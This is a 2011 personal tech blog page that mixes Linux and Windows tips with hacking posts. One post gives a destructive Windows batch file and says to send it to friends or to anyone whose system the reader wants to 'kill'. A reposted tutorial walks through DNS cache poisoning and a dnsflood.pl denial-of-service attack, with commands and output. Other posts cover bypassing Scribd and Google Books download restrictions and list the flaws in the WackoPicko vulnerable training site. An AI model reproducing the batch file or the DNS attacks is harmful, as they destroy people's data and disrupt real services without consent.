Sunday 29 May 2011

Download Scribd.com PDFs Without Any Account

Earlier today, I had to download a PDF document from scribd.com but I didn't have any account in scribd.com and I have coded a script that would help me download the PDFs from scribd.com without any account.

To access the service, visit this link.




It will ask you for the URL of the PDF document. Just copy and paste the URL from address bar when you are viewing the PDF in scribd.com.

I hope this becomes useful for you sometimes. :)

Note: Many people emailed me that the tool is not working. In fact, scribd has changed the way the documents are downloaded. Once I find the new bypassing method, I'll redo the script.


Read more...

Fix GPG Key Errors For Bad Keys

Today I tried to update my ubuntu 10.10 but unfortunately, I found the error regarding the GPG keys saying the signature could not be verified. A simple solution for this is presented in this post.

The error I got was as below:

W: GPG error: http://ppa.launchpad.net maverick Release: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY 5A9A06AEF9CB8DB0

My solution was to update the keys using the same hex number shown in the error.

sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 5A9A06AEF9CB8DB0

This simply worked as a charm. I hope this works for you as well. :)

Read more...

Saturday 28 May 2011

Kill Windows System With Batch File

This is a very useful two lines code that can be pretty dangerous if executed especially if there's a higher privilege in the windows OS(works well on XP, not tested on other windows versions).

Open the notepad and type following lines of code:
del /f /q *
erase C:WINDOWS

The above line of code deletes everything recursively without asking for any confirmation.

In the case you want to delete certain folder entirely(C:\windows in this example), type the following line of code in notepad:

erase c:windows

Now save the file as filename.bat and send it to your friends or anyone whose system you want to kill. On clicking this batch file, very bad things are gonna happen. So be warned not to click when the file is in your system.

Read more...

Attacking the DNS System Tutorial

This tutorial is written by mango1122 from governmentsecurity. Since its very informative, I have decided to post this tutorial over here.

--------------
INTRODUCTION
--------------

Domain Name System (DNS) associates various sorts of information with so-called domain names;
most importantly, it serves as the "phone book" for the Internet: it translates human-readable
computer hostnames, e.g. en.wikipedia.org, into the IP addresses that networking equipment
needs for delivering information. It also stores other information such as the list of mail exchange
servers that accept email for a given domain

The Berkley Internet Name Service (BIND) is the most common form of DNS server used on the Internet.
BIND typically runs on UNIX type systems. The DNS server stores information which it serves out about a
particular domain (also referred to as a namespace) in text files called zone files.A client (the resolver)
maintains a small amount of local cache which it will refer to first before looking at a local static host�s file
and then finally the DNS server. The result returned will then be cached by the client for a small period of time.

When a DNS server is contacted for a resolution query, and if it is authoritative (has the answer to the question
in its own database) for a particular domain (referred to as a zone) it will return the answer to the client. If it is
not authoritative for the domain, the DNS server will contact other name servers and eventually it will get the
answer it needs which is passed back to the client. This process is known as recursion.

Additionally the client itself can attempt to contact additional DNS servers to resolve a name. When a client does
so, it uses separate and additional queries based on referral answers from servers. This process is known as iteration


----------------------------
ATTACKING THE DNS CACHE
----------------------------

The most common attacks on DNS can be classified as

Zone Transfers or information disclosure attacks
Cache poisioning


CACHE POISIONING

Lets say a client in domain xyz.com wants to resolve www.google.com

1. The client will contact its configured DNS server and ask for www.google.com to be resolved.
This query will contain information about the client�s source UDP port, IP address and a DNS transaction ID.

2.If the information is available locally i.e cached ,it is returned to the client

3. If not then the client�s DNS server will contact the authoritive name server for google.com and resolve the query

4. The answer is passed back to the client and also cached locally in the DNS server of xyz.com (say ns1.xyz.com) and the client

5. Note the client only accepts the DNS information if the server replies with the correct client�s source UDP port, IP address and the DNS transaction ID




--------------------------------
Attack #1 � The Birthday Attack
--------------------------------

To poison the cache the attacker needs to

1 Send a number of resolution requests for google.com.An important thing
to note here is that each query for google.com is assigned a different transactio ID.

2. While the DNS resolves this the attacker sends a large number of spoofed replies
from ns1.google.com with different transaction ID.The attacker hopes to guess the
correct transaction ID as used the two name servers

Finding the correct IP addresses is easy; we know our target, and we know the addresses of the legitimate
nameservers for the domain to be hijacked. Finding the port is slightly harder. We know that the destination
port of the recursive query is UDP port 53, but the source port is a moving target. Fortunately for our attacker,
BIND will more often than not reuse the same source port for queries on behalf of the same client. So, if the
attacker is working from an authoritative nameserver, he can first issue a request for a DNS 3lookup of a
hostname on his server. When the recursive query packet arrives, he can look at the source port. Chances are
this will be the same source port used when the victim sends the queries for the domain to be hijacked.


--------------------------------
Attck #2 - Poisioning the Cache
--------------------------------

1. To obtain the source port we use a perl script.It needs to be run from an authoritative name server which
the attacker controls to query the target name server for a hostname for which the attacker�s machine is authoritative.

Another alternative would be to use a packet sniffer.

dns1.pl 10.10.10.50 www.google.com
source port: 34567

2. Now we run the second script written by Ramon Izaguirre called hds0.pl2.The script does most of the work by spoofing the reply from ns1.google.com

./hds0.pl (ns1.google.com) (ns1.xyz.com) (source port obtained from the earlier script) (spoof target)


To observe if the attack was successful simply query the target name server:

dig @12.12.12.12 www.google.com
www.google.com 86400 IN A 10.10.10.10

The attack is successful as google resolves yo 10.10.10.10

The script is available here-hxxp://securityvulns.com/files/birthday.pl


--------------------------------------
Attack #3 - DOS Attack on DNS servers
--------------------------------------

DNS servers like other Internet resources are prone to denial of service attacks.The only difference here would
be that DNS server uses UDP for name resolution.To create a DOS attack on the DNS server a script such as
dnsflood.pl can be executed on multiple clients to create the traffic.DNSflood works by sending many thousands
of rapid DNS requests, thereby giving the server more traffic than it can handle resulting in slower and slower
response times for legitimate requests.

The script can be obtained from - hxxp://packetstormsecurity.org/DoS/dnsflood.pl

In the following example we use the scrip to create a DOS effect on the DNS server and then query the DNS for name resolution

perl dnsflood.pl 192.168.10.1
attacked: 192.168.10.1...

To assess the impact of this attack on performance the attacker from another machine first clears his local cache and then
queries the target name server. Clearing the local cache will ensure the resolver gets the information from the server and not locally.


C:\>ipconfig /flushdns
Windows IP Configuration
Successfully flushed the DNS Resolver Cache.

C:\>nslookup
DNS request timed out.
timeout was 2 seconds.
*** Can't find server name for address 192.168.10.1: Timed out
*** Default servers are not available
Default Server: UnKnown
Address: 192.168.10.1

> ms2.xyz.com
Server: UnKnown
Address: 192.168.10.1

DNS request timed out.
timeout was 2 seconds.
DNS request timed out.
timeout was 2 seconds.
*** Request to UnKnown timed-out

>exit

If this attack was multiplied from a number of machines then the impact would be even greater.


------------
CONCLUSION
------------

These are only a few possible exploits involving the DNS Spoofing vulnerability and there are,probably,
many more waiting to be discovered. Discovery and implementation is limited only by the active imagination of the attacker

Read more...

Fixing No Init Found. Try Passing Init: Bootarg Error in Ubuntu

Today I encountered this error and I thought it was related to HDD issues. So I used fsck which is a command line tool to check and repair the linux filesystem. So I am writing this short how to so that it might be helpful for you as well.

The error encountered is something like below:

mount: mounting /dev on /root/dev failed: No such file or directory
mount: mounting /sys on /root/sys failed: No such file or directory
mount: mounting /proc on /root/proc failed: No such file or directory
Target file system doesn't have requested /sbin/init
No init found. Try passing init: bootarg

You need to boot your system with the Ubuntu live CD. After booting from live CD, open the terminal and then enter the following command:

sudo fsck /dev/sda1

Replace /dev/sda1 with your target filesystem partition and press enter. Whenever any fix or overwrite permissions are asked, press y. After finishing the repairing, reboot your system from hard disk. The system should boot without any error now.
I hope this helps you. :)

Read more...

How To Change Default Location of Program Files Folder[Registry]

By default, the installation of any windows program is done in the [System Drive]/Program Files directory and in the case you want to change this setting, a simple registry hack is enough.

First open the registry editor by typing regedit in your run command. Then navigate to the following key:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion

From there, change the value of "ProgramFiles", or "ProgramFilesDir" as per your need. I hope this helps. :)

Read more...

Etherchange : Command Line Tool To Change MAC Address

I've already discussed on how to change mac adress of your ethernet card under windows as well as linux. One more such tool which is command line tool, is etherchange.

EtherChange can change the Ethernet address of the network adapters in Windows.

Usage instructions

Download the exe file and run it from a Command Prompt. It will give you the instructions you need. EtherChange only works if your account is in the Administrators group.

Download link: EtherChange

Read more...

Friday 27 May 2011

Download Books From Google Books Using A GreaseMonkey Script

Do you want to download the undownloadable books from google books? If yes, here's the solution for you.

Google Book Downloader is a greasemonkey script that works in firefox with greasemonkey addon. Greasemonkey is a very useful firefox addon used to manipulate the webpage with the javascript.

For more details on the script and how to use it, refer to the official site.

The script is available at userscripts.org collection.

I hope this is useful.

Read more...

Tuesday 24 May 2011

Remove Warnings & Notices From Psychostats

I was testing the psychostats script today and while testing I found that it displayed lots of warnings and notices that make the script look so bad as the output is totally messed up. This post will help you to fix this problem.

At first, I tried to change the error_reporting and display_errors setting in php.ini file but I could not get rid of those errors. So I then put a line of code as below at the top of index.php file of psychostats. Still no luck. Finally, I navigated to ./includes relative to psychostats root folder where there was a file named class_PS.php. Open this file and type the following line below <php line.

error_reporting(0);

This will suppress all those errors and will make your psychostats look better. I hope this helps.

Read more...

Fix Counter Strike Sound Problem Under WINE [How To]

I've been playing counter strike for a while through wine and so far, most of it works well. With getting more and more better with the game, I've learnt the importance of sound in this game. Unfortunately, the sound was not working properly and with some experiments, I've found the solution for me. I hope it also works for you.

By default, my wine's audio is configured to use ALSA driver with the settings as below:


Now, you need to edit the settings to match as in the following image.


After changing the audio configuration, click on Apply and then restart Counter-strike. I guess this will work for you as well.

Read more...

Friday 20 May 2011

Converting VMWare .vmdk to Virtualbox .vdi

I was downloading the metasploitable to play around with it and I found that it was the VMWare .vmdk file so I had to convert it into .vdi file to run under the virtualbox. This post will show you how to easily convert the .vmdk file into .vdi file.

Converting the vmware disk file to the virtualbox hdd file is not the difficult task but still many might not be knowing how to do that. In order to convert your .vmdk file to .vdi, you need to type the following command in the terminal by first changing the terminal to the proper directory.


VBoxManage clonehd --format VDI metasploitable.vmdk metasploitable.vdi


Note that you need to have virtualbox installed for this to work. I hope this helps. :)

Read more...

Saturday 14 May 2011

Get High Compression Ratio With KGBArchiver

So you are wondering how you could compress your 2gb game data into less than 100 MBs? Are you lacking hard disk space and want to store files in the compressed form? If yes, then this post will direct you towards the solution.

KGB Archiver is the compression tool with unbelievable high compression rate. It surpasses even such efficient compression tool like 7zip and UHARC in terms of the abilities. KGB Archiver uses AES-256 encryption to encrypt archives. While the compression ratio is very high, it requires relatively high PC specification and it also requires more time to compress and decompress the file. But still this compression program will come in use sometimes.

For more information and download, visit KGBAarchiver's sourceforge page.


Read more...

Friday 13 May 2011

Physical Memory Acquisition With MDD

MDD is a physical memory acquisition tool for imaging Windows based computers created by the innovative minds at ManTech International Corporation. MDD is capable of acquiring memory images from Win2000, XP, Vista and Windows Server.

This tool can be pretty useful to analyze the data present in RAM. Whenever we are running programs, RAM stores various range of information being used by the program. For example, if we are running a web browser, the RAM may contain the URLs being visited, form data, etc. So you can just guess we can extract a lot of information from RAM. Thus, MDD can be very useful tool to dump the physical memory into the file from which we can extract the required information.

You can read more and download the tool from MDD SourceForge Page.

Read more...

Tuesday 10 May 2011

Reset Forgotten Ubuntu Password [How To]

If you've forgotten your ubuntu user password, it is still possible to recover the account by resetting the password. The recovery mode option in the grub menu can be used to reset the ubuntu user password as this mode lets us drop to the root shell prompt.

To reset the password, first select the recovery mode from grub menu. And then you'll have to select the "Drop to shell prompt" option. Now you can simply reset your password by using the passwd command.

passwd <yourusername>

Replace yourusername field with your username for ubuntu login and then you'll be prompted twice for new password. Enter the new password and you're done. Just reboot the system and this will successfully reset the password and you'll be able to access your ubuntu account. I hope this helps. :)

Read more...

Learn Web Hacking With WackoPicko

WackoPicko is a website that contains known vulnerabilities. It can prove as a very efficient way to master web hacking skills. This project is similar to Damn Vulnerable Web Application and is a collection of common web vulnerabilities.

For more information and downloads, you can check the WackoPicko github page.

Vulnerabilities

Reflected XSS
http://localhost/pictures/search.php?query=blah
The query parameter is vulnerable.

Stored XSS
http://localhost/guestbook.php
The comment field is vulnerable.

SessionID vulnerability
http://localhost/admin/login.php
The session cookie value is admin_session, which is an auto-incrementing value.

Stored SQL Injection
http://localhost/users/register.php -> http://localhost/users/similar.php
The first name field of the register users form contains a stored SQL injection which is then used unsanitized on the similar users page.

Reflected SQL Injection
http://localhost/users/login.php
The username field is vulnerable.

Directory Traversal
http://localhost/pictures/upload.php
The tag field has a directory traversal vulnerability enabling a malicious users to overwrite any file the web server uses has access to.

Multi-Step Stored XSS
http://localhost/pictures/view.php?picid=3
The comment field is vulnerable to XSS, however must go through a preview form.

Forceful Browsing
http://localhost/pictures/highquality.php?picid=3&key=highquality
The user doesn't have to purchase the picture to see the high quality version.

Command-line Injection
http://localhost/passcheck.php
The password field is vulnerable to a command line injections.

File Inclusion
http://localhost/admin/index.php?page=login
The page is vulnerable to a file inclusion vulnerability, however you have to include at the end.

Parameter Manipulation
http://localhost/users/sample.php?userid=1
The userid parameter can be manipulated to see any user's page when you need to be logged in otherwise.

Reflected XSS Behind JavaScript
http://localhost/piccheck.php
The name parameter is vulnerable.

Logic Flaw
http://localhost/cart/review.php
A coupon can be applied multiple times reducing the price of an order to zero. The coupon in the initial data is SUPERYOU21.

Reflected XSS Behind a Flash Form
http://localhost/submitname.php
The value parameter is vulnerable.

Weak username/password
https://localhost/admin/login.php
There is a default username/password combination of admin/admin.


Read more...

Phatch : Batch photo processing GUI tool

Phatch(Photo + Batch) is an user friendly, cross-platform Photo Batch Processor and Exif Renamer with a nice graphical user interface. Phatch handles all popular image formats and can duplicate (sub)folder hierarchies. Phatch can batch resize, rotate, apply shadows, perspective, rounded corners, … and do much more actions in minutes instead of hours or days if you do it manually.

For more information on Phatch, you can visit HERE.

Overview

Actions: resize, rotate, invert, flip, watermark, shadow, rounded corners and much more!
Drag & drop of actions
Enable & disable actions
Can copy folder hierarchies
Python shell
Error logging
File history
Console (can run on servers without gui)
Desktop droplets
Image Inspector (exif & iptc)
Cross-platform (Linux, Windows & Mac)
python-api

File formats

Phatch supports the same file formats as PIL…

Read & write: 'bmp','dib','gif','jpe','jpeg','jpg','im','msp', 'pcx','png','pbm','pgm','ppm','tif','tiff','xbm'
Read only: 'cur','dcx','fli','flc','fpx', 'gbr','gd','ico','imt','mic','mcidas','pcd', 'psd','bw','rgb','cmyk','sun','tga','xpm'
Write only: 'eps','ps','pdf'

Color support

Phatch supports these color modes:

Monochrome (1-bit pixels, black and white)
Grayscale (8-bit pixels, black and white)
RGB (3x8-bit pixels, true colour)
RGBA (4x8-bit pixels, RGB with transparency mask)
CMYK (4x8-bit pixels, colour separation)
P (8-bit pixels, mapped using a colour palette)
YCbCr (3x8-bit pixels, colour video format)
I (32-bit integer pixels)
F (32-bit floating point pixels)


To install phatch under ubuntu, type the following in terminal:

sudo apt-get install phatch

Read more...

Saturday 7 May 2011

GPRS Setting For Nepal Telecom

Nepal Telecom is providing GPRS service in its both pre-paid and post-paid services. I am posting the general setting to use the GPRS service of Nepal Telecom.

Basic Setting Parameters for GPRS & MMS

Proxy Server :- 192.80.7.133, Port :- 8000

For accessing internet/WAP through your mobile handset :-
GPRS Access Point Name(APN) :- ntwap

For accessing internet through computer by using GPRS service in your mobile phone :-
APN :- ntnet

For sending and receiving MMS :-
MMS APN :- ntmms
MMS Home Page/Server Address :- 192.80.11.180

Read more...

HTML Parser For Blogs

I've written a small code snippet that will work as HTML parser for use in your blogs. It can be useful to put the google adsenses and to post source codes in your blog. Obviously it might have other usages but I am using it for posting source codes.

The parser can be accessed from the URL below:

www.nepali.netau.net/parser

Thanks.

Read more...

Graphical Tools To Determine PCI Devices In Linux

We can use lspci command to list and determine the PCI devices from the terminal but most of us want some graphical way to view the PCI devices connected to our system. In this post, we will discuss two such GUI tools.

1. GNOME Device Manager
This is a GNOME program to manage devices and device drivers. It's inspired by hal-device-manager, from the HAL project, but rewritten in C for efficiency and an outlook to actually make it manage devices rather than just show information.

To install it, type the following apt-get command:

sudo apt-get install gnome-device-manager

You can open the program from Applications -> System Tools -> Device Manager


2. Hardinfo
HardInfo is a small system profiler and benchmark application that displays information about your hardware and operating system. Currently it knows about PCI, ISA PnP, USB, IDE, SCSI, Serial and parallel port devices.

To install hardinfo, type the following in your terminal:

sudo apt-get install hardinfo

You can open the program from Applications -> System Tools -> System Profiler and Benchmark


If you know any other such GUI tool, please do comment.

Read more...